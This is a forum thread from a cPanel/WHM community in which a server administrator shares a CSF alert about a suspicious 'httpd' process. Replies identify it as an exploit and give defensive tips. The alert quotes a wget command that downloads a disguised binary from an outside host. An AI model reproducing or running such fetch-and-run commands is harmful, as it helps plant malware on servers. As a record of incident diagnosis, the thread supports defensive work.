The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

faked httpd

Discussion in 'General Discussion' started by colorcloud, Nov 11, 2008.

  1. colorcloud

    colorcloud Active Member

    Joined:
    Aug 14, 2003
    Messages:
    28
    Likes Received:
    0
    Trophy Points:
    1
    I just get CSF's email with the following messages:

    Code:
    PID:     30735
    Account: nobody
    Uptime:  81 seconds
    
    Executable:
    
    /usr/bin/wget
    
    
    Command Line (often faked in exploits):
    
    wget http://www.bigbizz.net/httpd
    
    
    Network connections by the process (if any):
    
    tcp6: 0.0.0.0:80 -> 0.0.0.0:0
    tcp6: 0.0.0.0:443 -> 0.0.0.0:0
    tcp6: 61.63.20.135:80 -> 60.50.63.43:59056
    Any one know what is the purpose of this fake httpd ?
    I cant see which account is execute wget command, how can I find it?
     
  2. neutro

    neutro Well-Known Member

    Joined:
    Apr 11, 2004
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Use WHM Check current running process.
    or ps auxwf in ssh.

    chmod your wget binary to 700
     
  3. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    It's an exploit. You would have to look in WHM > Apache Status when you see that running as you're not running with suPHP compiled into apache/php which would show you the username.
     
Loading...

Share This Page